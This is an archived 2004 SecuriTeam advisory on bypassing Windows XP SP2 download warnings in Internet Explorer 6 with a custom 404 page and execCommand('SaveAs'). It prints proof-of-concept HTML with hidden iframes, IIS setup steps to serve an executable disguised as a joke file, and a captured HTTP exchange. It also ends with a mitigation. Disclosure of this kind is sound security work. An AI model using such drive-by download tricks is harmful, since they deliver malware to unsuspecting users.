Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Circumvent Windows XP SP2 Security Features using execCommand 'Save

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function
Date: 22 Nov 2004 16:39:16 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' 
Function
------------------------------------------------------------------------


SUMMARY

Microsoft Internet Explorer (including IE for Windows XP SP2) is reported 
to be vulnerable to a file downloading security warning bypass. This 
unpatched flaw may be exploited to download a malicious executable file 
masqueraded as an HTML file.

DETAILS

Vulnerable Systems:
 * Internet Explorer version 6

When your browser cannot locate the URL that you entered in the address 
bar, you will receive a 404 error message telling you that the file was 
not found. This exploit described below utilizes a custom HTTP 404 error 
message (v.exe) which is feed to the execCommand Method, which in turn 
executes the file (without warning). The only user input required is for 
the user to accept a prompts requesting him to "Save an HTML Document".

1. Bypasses the "File Download - Security Warning".
Each time you click a download link, Windows XP pops up a "File Download - 
Security Warning", making you aware that Windows is downloading a program. 
In addition Windows XP will ask for your permission to complete the 
download process.

2. Bypasses the "Open File - Security Warning".
Launching a downloaded executable that originates from an untrusted 
location (zone) such as the Internet will bring up a "Open File - Security 
Warning" that will ask you for the permission to install the file.

The execCommand Method:
The execCommand method executes a command on the current document. One of 
the many parameters of this method is the SaveAs Command that saves the 
current Web page to a local file. The SaveAs Command has the following 
format: document.execCommand('SaveAs', '1', 'Name of the webpage.htm');

How does it work? (Exploit):
Notice that you didn't receive any warning messages such as: "File 
Download - Security Warning" or "Open File - Security Warning".
In addition, if "Hide file extensions for known file types" (Tools->Folder 
Options...->View) is enabled, (i.e., 'funny joke.exe' appears as 'funny 
joke') it's possible to trick a user into downloading a malicious 
executable file, masquerading it as an HTML document (Windows XP SP2 would 
normally prevents direct downloading, but in our case it doesn't).

The following code requires no special server setup, and should work from 
any web page that IE 6.0 downloads:
< html>
 < body>
 < iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" 
height="0"></iframe>Click
 < a href=# 
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
 joke.exe');">
 here</a>.
 </body>
 </html>

In addition, here's an example that requires modifying the IIS Error 
Mapping Properties (see below):
Steps to configure IIS:
Launch Internet Information Services manager. Under the 'Custom Errors' 
tab, modify the Error Mapping Properties as follows:
 * Error Code: 404
 * Default Text: Not Found
 * Message Type: URL
 * URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it 
will trigger a 404 error message as defined above. But, the JavaScript 
code below references the stealthy v.exe data within the frame 'NotFound' 
and is linked to 'funny joke.exe' when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny 
joke.exe');

Entire code sample for the 404 error page:
< html>
 < body>
 < iframe src='vengy404.htm' name="NotFound" width="0" 
height="0"></iframe>Click
 < a href=# 
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
 joke.exe');">
 here</a>.
 </body>
 </html>

Breakdown of the TCP Stream going from an Internet Explorer to an IIS:
Here's what occurs internally when fetching the exploit web page plus the 
404 error message (v.exe).

 GET /// HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
If-None-Match: "7e5914d584cbc41:10d2"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Server: Microsoft-IIS/5.1
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/index.htm
ETag: "7e5914d584cbc41:10d2"
Content-Length: 0

GET ///vengy404.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Cache-Control: no-cache,no-transform
Expires: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: 
http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Vary: *
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 91408
<---V.EXE binary data goes here --->


Solution:
Disable Active Scripting and the "Hide file extensions for known file 
types" option
[Tools->Folder Options-> View]

Conclusion:
Overall IE attempts to intercept risky code and prompts a security warning 
message, but it seems to allow custom HTTP errors to filter through those 
security checks.

Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', 
saving it to the desktop installs a global hotkey, so it may be possible 
to execute the downloaded file by simply forcing the user to press the 
Enter key "alert('Thanks. Press Return')".
Funny and scary how a few well placed characters <iframe src='v.exe?.htm' 
... can confuse the IE monster, whereas specifying <iframe src='v.exe' 
... is handled correctly!


ADDITIONAL INFORMATION

The information has been provided by Cyber flash A.K.A Vengy and  
<mailto:Special-Alerts@k-otik.com> K-OTiK team.
The original article can be found at:  
<http://www.k-otik.com/exploits/20041119.IESP2disclosure.php> 
http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Original exploit code can be found at:  
<http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php> 
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function, SecuriTeam <=
Previous by Date:  [UNIX] Privilege Escalation Vulnerabilities in W-Channel Embedded Linux, SecuriTeam
Next by Date:  [EXPL] CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit, SecuriTeam
Previous by Thread:  [UNIX] Privilege Escalation Vulnerabilities in W-Channel Embedded Linux, SecuriTeam
Next by Thread:  [EXPL] CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]